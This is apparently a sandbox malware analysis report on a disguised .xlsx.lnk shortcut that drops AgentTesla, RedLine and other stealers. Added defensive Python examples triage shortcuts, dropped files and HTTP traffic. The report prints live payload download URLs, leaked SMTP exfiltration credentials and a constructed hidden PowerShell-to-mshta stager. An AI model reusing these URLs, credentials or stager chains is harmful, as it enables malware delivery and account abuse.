Windows Analysis Report
FT. 40FE CNY .xlsx.lnk

Overview

General Information

Sample name: FT. 40FE CNY .xlsx.lnk
Analysis ID: 1430751
MD5: 82fde340f187a517e0feced1d4972363
SHA1: 07740ba4e30a1dbc830451a0d05130ba1af28be9
SHA256: e900f16dc064f78f6d81fda1dc52a17116d4bb578e6ef528e2f04b3e46b434a3
Tags: lnk

Detection

AgentTesla, DBatLoader, PureLog Stealer, RedLine
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Yara detected AgentTesla
Yara detected DBatLoader
Yara detected PureLog Stealer
Yara detected RedLine Stealer
.NET source code contains method to dynamically call methods (often used by packers)
Allocates memory in foreign processes
Drops PE files with a suspicious file extension
Found URL in windows shortcut file (LNK)
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Powershell drops PE file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses process hollowing technique
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Program Location with Network Connections
Suspicious powershell command line found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Windows shortcut file (LNK) contains suspicious command line arguments
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to detect virtual machines (SLDT)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Gzip Archive Decode Via PowerShell
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Outbound SMTP Connections
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match
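
Worked example for the shortcut and PowerShell signatures above (LNK contains suspicious command line arguments, Found URL in windows shortcut file, Base64 Encoded PowerShell Command, FromBase64String cmdlet, Gzip Archive Decode Via PowerShell). This is an added example, not code from the report or from Joe Sandbox: it walks the MS-SHLLINK layout far enough to reach the StringData fields, then unwraps a PowerShell command line one layer at a time. The shortcut bytes, the three-layer command line and the URL http://example.invalid/yt.hta are constructed for the demo; the report does not print this sample's actual arguments, so nothing below claims to be them.

```python
"""Added example, not code from the report or from Joe Sandbox: parse a .lnk's
StringData per MS-SHLLINK, unwrap PowerShell -enc / FromBase64String / gzip
layers, and flag the tells. Shortcut bytes and the URL are constructed."""
import base64
import gzip
import re
import struct

# LinkFlags bits (MS-SHLLINK 2.1.1) that decide which optional blocks follow the header.
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_RELATIVE_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
STRING_DATA = [("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
               ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
               ("icon_location", HAS_ICON_LOCATION)]          # fixed on-disk order
ENC_RE = re.compile(r"-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
B64_RE = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
URL_RE = re.compile(r"https?://[^\s'\"<>]+")
LOLBINS = ("mshta", "powershell", "pwsh", "cmd", "wscript", "cscript", "rundll32", "certutil")


def parse_lnk(blob: bytes) -> dict:
    """Header -> [IDList] -> [LinkInfo] -> StringData; return the StringData fields."""
    if struct.unpack_from("<I", blob, 0)[0] != 0x4C:
        raise ValueError("HeaderSize is not 0x4C: not a shell link")
    flags = struct.unpack_from("<I", blob, 0x14)[0]
    pos = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:            # uint16 IDListSize, then the item list
        pos += 2 + struct.unpack_from("<H", blob, pos)[0]
    if flags & HAS_LINK_INFO:                      # uint32 LinkInfoSize counts itself
        pos += struct.unpack_from("<I", blob, pos)[0]
    fields = {}
    for key, bit in STRING_DATA:                   # each: uint16 CountCharacters + chars
        if flags & bit:
            count = struct.unpack_from("<H", blob, pos)[0]
            width = 2 if flags & IS_UNICODE else 1
            fields[key] = blob[pos + 2:pos + 2 + count * width].decode(
                "utf-16-le" if width == 2 else "latin-1")
            pos += 2 + count * width
    return fields

def unwrap_powershell(cmdline: str) -> dict:
    """Peel -EncodedCommand (base64 of UTF-16LE), then FromBase64String blobs, gunzipping when magic matches."""
    layers, encoded, gunzipped = [cmdline], False, False
    m = ENC_RE.search(cmdline)
    if m:
        try:
            layers.append(base64.b64decode(m.group(1)).decode("utf-16-le"))
            encoded = True
        except (ValueError, UnicodeDecodeError):   # not really an encoded command
            pass
    for blob in B64_RE.findall(layers[-1]):
        raw = base64.b64decode(blob)
        if raw[:2] == b"\x1f\x8b":                 # gzip magic: the "Gzip Archive Decode" tell
            raw, gunzipped = gzip.decompress(raw), True
        layers.append(raw.decode("utf-8", "replace"))
    return {"layers": layers, "encoded_command": encoded, "gunzipped": gunzipped}

def triage_lnk(filename: str, blob: bytes) -> dict:
    """Parsed fields + unwrapped command line -> sorted list of flags."""
    fields = parse_lnk(blob)
    unwrapped = unwrap_powershell(fields.get("arguments", ""))
    # Blank long base64 runs first so random base64 bytes cannot spell "cmd" or a URL.
    text = re.sub(r"[A-Za-z0-9+/=]{40,}", " ",
                  "\n".join(list(fields.values()) + unwrapped["layers"])).lower()
    flags = set()
    if re.search(r"\.[a-z0-9]{1,5}\s*\.lnk$", filename, re.I):   # e.g. ".xlsx.lnk"
        flags.add("double_extension")
    for name in LOLBINS:
        if re.search(r"\b%s(?:\.exe)?\b" % name, text):
            flags.add("lolbin:" + name)
    for url in URL_RE.findall(text):
        flags.add("url:" + url)
    if unwrapped["encoded_command"]:
        flags.add("encoded_command")
    if unwrapped["gunzipped"]:
        flags.add("gzip_stage")
    return {"fields": fields, "layers": unwrapped["layers"], "flags": sorted(flags)}

def build_sample_lnk(relative_path: str, arguments: str) -> bytes:
    """Constructed minimal link: header, RelativePath and Arguments, Unicode strings."""
    header = bytearray(0x4C)
    struct.pack_into("<I", header, 0, 0x4C)
    header[4:20] = bytes.fromhex("0114020000000000c000000000000046")   # LinkCLSID
    struct.pack_into("<I", header, 0x14, HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE)
    sd = lambda s: struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return bytes(header) + sd(relative_path) + sd(arguments)

def build_sample_cmdline() -> str:
    """Constructed three-layer command line: -enc -> FromBase64String -> gzip -> stager."""
    stage2 = "Start-Process mshta 'http://example.invalid/yt.hta'"   # hypothetical URL
    gz = base64.b64encode(gzip.compress(stage2.encode(), mtime=0)).decode()
    stage1 = ("$s=New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream"
              "(,[Convert]::FromBase64String('%s'))),[IO.Compression.CompressionMode]"
              "::Decompress);IEX (New-Object IO.StreamReader($s)).ReadToEnd()" % gz)
    return "-w hidden -nop -ep bypass -enc " + base64.b64encode(stage1.encode("utf-16-le")).decode()

SAMPLE_RELPATH = r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
```

Run it on a real shortcut with triage_lnk(name, open(path, "rb").read()); on the constructed sample it reports double_extension, encoded_command, gzip_stage, lolbin:mshta, lolbin:powershell and the URL, and the last layer is the plain mshta stager. The parser skips the LinkTargetIDList and LinkInfo blocks by their size fields only; ExtraData blocks sit after the StringData and do not affect the fields read here. Long base64 runs are blanked before the LOLBin and URL scan so that random base64 bytes cannot spell a false hit.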

Classification

Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name: DBatLoader
Description: This Delphi loader misuses cloud storage services, such as Google Drive, to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Name: RedLine Stealer
Description: RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

AV Detection

Source: FT. 40FE CNY .xlsx.lnk Avira: detected
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware (this string belongs to the Pester module bundled with Windows PowerShell and is found here only in powershell.exe memory; treat the reputation hit as a likely false positive, not as infrastructure of the sample)
Source: https://www.sessosesso.it/assets/aw/uc.exe Avira URL Cloud: Label: malware
Source: cmd.exe.5360.20.memstrmin Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "mail.irmaklarpaslanmaz.com.trB", "Username": "muhasebe@irmaklarpaslanmaz.com.tr", "Password": "MH5473588PmZ&"}
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF ReversingLabs: Detection: 58%
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF Virustotal: Detection: 38%
Source: C:\Users\Public\Libraries\netutils.dll ReversingLabs: Detection: 28%
Source: C:\Users\Public\Libraries\netutils.dll Virustotal: Detection: 47%
Source: C:\Users\user\AppData\Roaming\uc.exe ReversingLabs: Detection: 58%
Source: C:\Users\user\AppData\Roaming\uc.exe Virustotal: Detection: 38%
Source: FT. 40FE CNY .xlsx.lnk ReversingLabs: Detection: 31%
Source: FT. 40FE CNY .xlsx.lnk Virustotal: Detection: 24%
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\uc.exe Joe Sandbox ML: detected
Source: FT. 40FE CNY .xlsx.lnk Joe Sandbox ML: detected
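
Added example for the drop pattern listed in this section (Ucvuiswb.PIF and netutils.dll under C:\Users\Public\Libraries, uc.exe under AppData\Roaming) and for the signatures "Drops PE files with a suspicious file extension" and "Execution from Suspicious Folder": a hunt that trusts the MZ/PE header rather than the file name. This is not code from the report or from Joe Sandbox. The directory tree it scans is constructed in a temporary folder to mirror those paths, and the files are header-only stubs, not the real samples.

```python
"""Added example, not from the report: find PE files that hide behind a non-PE
extension or sit in user-writable drop directories. The sample tree is
constructed; only the MZ/PE header check is the real logic."""
import struct
import tempfile
from pathlib import Path

PE_EXTENSIONS = {".exe", ".dll", ".sys", ".scr", ".ocx", ".cpl", ".drv", ".efi", ".mui"}
# Lower-case path fragments (backslash form) where legitimate installers rarely
# put executables but loaders such as the one in this report do.
DROP_DIRS = ("users\\public\\", "appdata\\roaming\\", "appdata\\local\\temp\\", "programdata\\")


def is_pe(path: Path) -> bool:
    """True when the file has an MZ stub whose e_lfanew points at a 'PE\\0\\0' signature."""
    with open(path, "rb") as f:
        head = f.read(0x40)
        if len(head) < 0x40 or head[:2] != b"MZ":
            return False
        e_lfanew = struct.unpack_from("<I", head, 0x3C)[0]
        f.seek(e_lfanew)
        return f.read(4) == b"PE\0\0"


def hunt(root: str) -> list:
    """Return sorted (relative path, reasons) for every suspicious PE under root."""
    findings = []
    for p in Path(root).rglob("*"):
        if not p.is_file() or not is_pe(p):
            continue
        rel = str(p.relative_to(root)).replace("/", "\\")
        reasons = []
        if p.suffix.lower() not in PE_EXTENSIONS:        # e.g. a PE named .PIF
            reasons.append("pe_with_non_pe_extension")
        if any(d in rel.lower() for d in DROP_DIRS):
            reasons.append("pe_in_user_writable_dir")
        if reasons:
            findings.append((rel, reasons))
    return sorted(findings)


def _pe_stub() -> bytes:
    """Constructed stub: MZ header, e_lfanew = 0x40, 'PE\\0\\0' at 0x40, nothing else."""
    stub = bytearray(0x80)
    stub[:2] = b"MZ"
    struct.pack_into("<I", stub, 0x3C, 0x40)
    stub[0x40:0x44] = b"PE\0\0"
    return bytes(stub)


def build_sample_tree(root: str) -> None:
    """Constructed layout mirroring the dropped paths in the report, plus two controls."""
    files = {
        "Users/Public/Libraries/Ucvuiswb.PIF": _pe_stub(),
        "Users/Public/Libraries/netutils.dll": _pe_stub(),
        "Users/user/AppData/Roaming/uc.exe": _pe_stub(),
        "Users/user/Documents/Book1.xlsx": b"PK\x03\x04" + bytes(0x80),   # not a PE
        "Windows/System32/kernel32.dll": _pe_stub(),                      # PE in a normal place
    }
    for rel, data in files.items():
        path = Path(root, *rel.split("/"))
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_bytes(data)


def demo() -> list:
    """Build the sample tree in a temp dir, run the hunt, return the findings."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return hunt(root)


if __name__ == "__main__":
    for rel, reasons in demo():
        print(rel, ", ".join(reasons))
```

On the constructed tree the PIF is flagged twice (non-PE extension and drop directory), netutils.dll and uc.exe once each, and the spreadsheet and kernel32.dll not at all. Point hunt() at a mounted image or a live root for the real thing; a PE renamed .pif in Users\Public\Libraries is exactly what this report shows, and Explorer still executes it because .pif is treated as an executable type.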

Compliance

Source: C:\Users\Public\Libraries\bwsiuvcU.pif Unpacked PE file: 23.2.bwsiuvcU.pif.400000.0.unpack
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Unpacked PE file: 25.2.bwsiuvcU.pif.400000.0.unpack
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Unpacked PE file: 27.2.bwsiuvcU.pif.400000.0.unpack
Source: unknown HTTPS traffic detected: 89.46.106.29:443 -> 192.168.2.7:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 89.46.106.29:443 -> 192.168.2.7:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 89.46.106.29:443 -> 192.168.2.7:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 89.46.106.29:443 -> 192.168.2.7:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49716 version: TLS 1.2
Source: Binary string: calc.pdbGCTL source: mshta.exe, 00000009.00000003.1852414679.0000019AC1771000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1855006902.000001A2C46D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852363981.000001A2C46CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1863703689.0000019AC1772000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852558870.000001A2C46E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852439079.000001A2C46DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1851615477.000001A2C4722000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852067245.000001A2C4393000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1865516494.000001A2C46F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852507533.000001A2C4710000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852261324.000001A2C46D5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852234112.000001A2C438F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852117667.0000019AC1757000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1851691454.000001A2C438D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1853065476.000001A2C46E5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1865380060.000001A2C46D1000.00000004.00000020.00020000.00000000.sdmp, yt[1].hta.9.dr
Source: Binary string: PSReadline.pdbaK source: powershell.exe, 00000011.00000002.1635136687.0000029E326E4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000011.00000002.1629294581.0000029E323A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdb source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp, easinvoker.exe.19.dr
Source: Binary string: _.pdb source: bwsiuvcU.pif, 00000017.00000002.1680345757.000000003DA95000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000003.1516343993.000000003BDC9000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1681909755.0000000040260000.00000004.08000000.00040000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1681582310.000000003EDE1000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1787983024.0000000025D95000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1791650361.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000003.1634916828.0000000023FF4000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1790805820.0000000026F71000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2555827704.0000000040350000.00000004.08000000.00040000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000003.1719620200.000000003BD8F000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2554498447.000000003DA65000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2555544877.000000003ED31000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: calc.pdb source: mshta.exe, 00000009.00000003.1852414679.0000019AC1771000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1855006902.000001A2C46D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852363981.000001A2C46CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1863703689.0000019AC1772000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852067245.000001A2C4393000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852117667.0000019AC1757000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1851691454.000001A2C438D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1865380060.000001A2C46D1000.00000004.00000020.00020000.00000000.sdmp, yt[1].hta.9.dr
Source: Binary string: easinvoker.pdbH source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1514685918.0000000014B20000.00000004.00000020.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp, easinvoker.exe.19.dr
Source: Binary string: owershell.PSReadline.pdb source: powershell.exe, 00000011.00000002.1629294581.0000029E32432000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_029858CC GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 19_2_029858CC
Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_0299C8AC InternetCheckConnectionA, 19_2_0299C8AC
Source: global traffic HTTP traffic detected: GET /assets/aw/Book1.xlsx HTTP/1.1 | Host: sessosesso.it | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /assets/aw/uc.exe HTTP/1.1 | Host: www.sessosesso.it | Connection: Keep-Alive
Source: Joe Sandbox View IP Address: 13.107.139.11
Source: Joe Sandbox View ASN Name: UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View ASN Name: ARUBA-ASNIT
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic HTTP traffic detected: GET /assets/aw/yt.hta HTTP/1.1 | Accept: */* | Accept-Language: en-CH | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: www.sessosesso.it | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download?resid=849ABDB14CA5CEC3%21220&authkey=!AGW69_d3Nli6r4Y HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: onedrive.live.com
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1 (5 events)
Source: unknown DNS traffic detected: queries for: www.sessosesso.it
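
Added example for the request lines above and the networking signatures "HTTP GET or POST without a user agent" and "Uses a known web browser user agent for HTTP communication". It is not code from the report or from Joe Sandbox. The requests are rebuilt from the traffic lines with CRLF header breaks restored (the yt.hta User-Agent shortened to its identifying tokens), plus one Chrome request to example.org as a benign control. The urlmon rule encodes that WinINet clients such as mshta.exe still advertise MSIE 7.0 with Trident/7.0 on Windows 10, a string modern browsers do not send (IE in Compatibility View aside), so it is a process-context tell rather than proof on its own; WinHttp.WinHttpRequest.5 is the ProgID of the WinHTTP COM object that HTA and VBScript code drives.

```python
"""Added example, not from the report: score raw HTTP requests for the tells
the networking signatures key on. Requests below are constructed from the
report's traffic lines plus a benign control."""
import re

SAMPLE_REQUESTS = [
    "GET /assets/aw/Book1.xlsx HTTP/1.1\r\nHost: sessosesso.it\r\nConnection: Keep-Alive\r\n\r\n",
    "GET /assets/aw/uc.exe HTTP/1.1\r\nHost: www.sessosesso.it\r\nConnection: Keep-Alive\r\n\r\n",
    ("GET /assets/aw/yt.hta HTTP/1.1\r\nAccept: */*\r\nUser-Agent: Mozilla/4.0 (compatible; "
     "MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0)\r\nHost: www.sessosesso.it\r\n\r\n"),
    ("GET /download?resid=849ABDB14CA5CEC3%21220&authkey=!AGW69_d3Nli6r4Y HTTP/1.1\r\n"
     "User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)\r\n"
     "Host: onedrive.live.com\r\n\r\n"),
    ("GET /index.html HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) "
     "AppleWebKit/537.36 Chrome/120.0 Safari/537.36\r\nHost: example.org\r\n\r\n"),   # control
]

# User-Agents that name a scripting or automation client rather than a browser.
SCRIPT_UA = re.compile(r"WinHttp\.WinHttpRequest|Microsoft BITS|PowerShell|curl/|python-", re.I)
# WinINet/urlmon default string on Windows 10 (mshta, Office and other non-browser clients).
URLMON_UA = re.compile(r"MSIE [5-9]\.0;.*Trident/7\.0")
PAYLOAD_EXT = re.compile(r"\.(?:hta|exe|pif|scr|dll|ps1|vbs|vbe|js|jse|wsf|cmd|bat)$", re.I)
CLOUD_STORAGE = re.compile(r"(?:^|\.)(?:onedrive\.live\.com|drive\.google\.com|1drv\.ms|dropbox\.com)$", re.I)


def parse_request(raw: str) -> dict:
    """Split a raw request into method, target and a lower-cased header map."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers}


def triage_request(raw: str) -> dict:
    """Return host, target and the ordered list of reasons the request is suspicious."""
    req = parse_request(raw)
    headers, reasons = req["headers"], []
    ua = headers.get("user-agent")
    if ua is None:
        reasons.append("no_user_agent")             # "HTTP GET or POST without a user agent"
    elif SCRIPT_UA.search(ua):
        reasons.append("scripting_user_agent")      # e.g. WinHttpRequest.5 driven from an HTA
    elif URLMON_UA.search(ua):
        reasons.append("urlmon_user_agent")         # WinINet client claiming to be IE7
    path = req["target"].split("?", 1)[0]
    if PAYLOAD_EXT.search(path):
        reasons.append("payload_extension")
    host = headers.get("host", "").split(":")[0]
    if CLOUD_STORAGE.search(host) and "download" in req["target"].lower():
        reasons.append("cloud_storage_download")    # loader staging from cloud storage
    return {"host": host, "target": req["target"], "reasons": reasons}


def triage_all(requests: list) -> list:
    """Keep only flagged requests, most reasons first (stable for ties)."""
    out = [triage_request(r) for r in requests]
    return sorted((r for r in out if r["reasons"]), key=lambda r: -len(r["reasons"]))


if __name__ == "__main__":
    for r in triage_all(SAMPLE_REQUESTS):
        print(r["host"], r["target"], ", ".join(r["reasons"]))
```

On the constructed set the spreadsheet fetch gets only the missing User-Agent, uc.exe adds the payload extension, yt.hta pairs the urlmon string with an .hta path, the OneDrive fetch pairs the WinHTTP COM string with a cloud download, and the Chrome control gets nothing. Feed it the requests from a proxy log or a pcap export and sort by reason count to surface the loader chain first.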
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
